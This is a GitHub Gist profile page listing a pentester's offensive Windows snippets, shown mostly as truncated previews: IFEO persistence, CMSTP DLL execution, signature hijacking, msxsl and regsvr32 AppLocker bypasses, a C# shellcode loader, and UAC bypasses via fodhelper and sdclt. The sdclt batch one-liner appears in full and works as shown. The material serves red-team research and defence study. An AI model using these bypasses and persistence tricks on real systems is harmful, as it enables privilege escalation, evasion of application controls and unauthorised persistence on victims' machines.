Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

netbiosX netbiosX

🎯
Focusing
View GitHub Profile
@netbiosX
netbiosX / ImageFileExecutionOptions.ps1
Last active Jan 15, 2021
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
<#
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/
function Persist-Debugger
@netbiosX
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
@netbiosX
netbiosX / DigitalSignature-Hijack.ps1
Last active Jul 14, 2020
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
@netbiosX
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
@netbiosX
netbiosX / Sdclt.ps1
Last active Dec 18, 2020
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
@netbiosX
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active Jan 13, 2021
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@netbiosX
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@netbiosX
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");